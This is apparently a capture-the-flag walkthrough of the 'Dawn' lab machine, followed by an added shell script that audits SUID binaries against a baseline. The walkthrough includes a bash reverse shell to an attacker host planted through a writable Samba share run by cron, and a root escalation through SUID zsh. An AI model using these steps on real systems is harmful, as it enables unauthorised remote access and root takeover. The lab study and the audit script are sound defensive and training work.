This is a walkthrough of the machine Dawn from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Samba, SUID misconfiguration

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 80 - HTTP
  • 139/445 - Samba
  • 3306 - MySQL

Webapp

The web application on port 80 does not reveal anything interesting, displaying a generic "under construction" page:

To dig deeper, we will enumerate it using gobuster:

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64

We get a hit on /logs, which is an open directory containing four log files.

The only accessible log file is management.log, so we can download it to take a closer look.

wget http://<IP>/logs/management.log

The file contains logs from pspy - a process monitoring tool. Scrolling down a bit, we discover what appears to be a cronjob executing the following commands every minute:

Samba

We will briefly take a detour to enumerate Samba, first listing what shares are available using smbclient:

smbclient -L \\\\<IP>\\

We can see the same share, ITDEPT, from which the cronjob executes product-control and web-control.

Initial access

Since the cronjob will execute these files, and we have access to the share, we will start off by creating a simple reverse shell.

web-control:

#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Next, we will start a listener to catch the shell:

nc -lvnp <PORT>

And finally, we will connect to the ITDEPT share, and upload web-control:

smbclient \\\\<IP>\\ITDEPT

put web-control

Within a minute, we receive a shell as www-data, and can read the first local.txt flag:

Privilege escalation

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/bin/zsh:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by running the following, which provides us with a root shell to finally read the second proof.txt flag:

zsh
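From the defender's side, the finding to catch is the SUID bit on an interactive shell. The one-off find above lists every SUID file, but a comparison against a baseline is what surfaces drift. The script below is an added example, not part of the original writeup: it lists SUID regular files under a root, compares them against an allowlist file holding one expected absolute path per line (for example /usr/bin/passwd), and rates any shell or interpreter as critical. It assumes a find(1) with -xdev and -perm -4000 (GNU or BSD) and a POSIX grep; the remediation for this machine is simply chmod u-s /usr/bin/zsh.

```shell
#!/bin/sh
# Added example (not part of the original writeup): audit set-uid binaries
# against an allowlist so that an unexpected one, such as a SUID zsh, is
# reported instead of buried in the full find(1) output.
# Assumes a find(1) with -xdev and -perm -4000 (GNU or BSD) and POSIX grep.

# audit_suid ROOT BASELINE
#   ROOT     directory tree to scan (one filesystem, e.g. /)
#   BASELINE file with one expected absolute path per line (e.g. /usr/bin/passwd)
#   Prints unexpected SUID files, rating shells and interpreters CRITICAL.
#   Returns 0 when nothing outside the baseline is found, 1 otherwise.
audit_suid() {
    root=$1
    baseline=$2
    # A blank line in a grep -f pattern file matches every line, which would
    # silently allowlist every binary; strip blanks into a temporary copy.
    clean=$(mktemp)
    grep -v '^[[:space:]]*$' "$baseline" > "$clean" 2>/dev/null || true
    # All set-uid regular files under ROOT, sorted, staying on one filesystem.
    found=$(find "$root" -xdev -type f -perm -4000 2>/dev/null | sort)
    # Whole-line, fixed-string comparison against the allowlist.
    unexpected=$(printf '%s\n' "$found" | grep -vxF -f "$clean" || true)
    rm -f "$clean"
    if [ -z "$unexpected" ]; then
        echo "OK: no SUID files outside baseline under $root"
        return 0
    fi
    printf '%s\n' "$unexpected" | while IFS= read -r f; do
        [ -z "$f" ] && continue
        case "$(basename "$f")" in
            sh|bash|dash|zsh|ksh|fish|perl|python*|ruby|php*)
                echo "CRITICAL: SUID shell/interpreter (any local user gets a root shell): $f" ;;
            *)
                echo "WARN: SUID file not in baseline: $f" ;;
        esac
    done
    return 1
}

# Usage: sh audit_suid.sh / /etc/suid.baseline
if [ $# -ge 2 ]; then
    audit_suid "$1" "$2"
fi
```

Generate the baseline once on a freshly built host (the find command from the writeup, redirected to a file), review it by hand, and run the audit from a root cron job or a configuration management check; the exit status makes it easy to alert on. Note that -xdev keeps the scan on one filesystem, so each mounted filesystem that can hold executables needs its own run.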
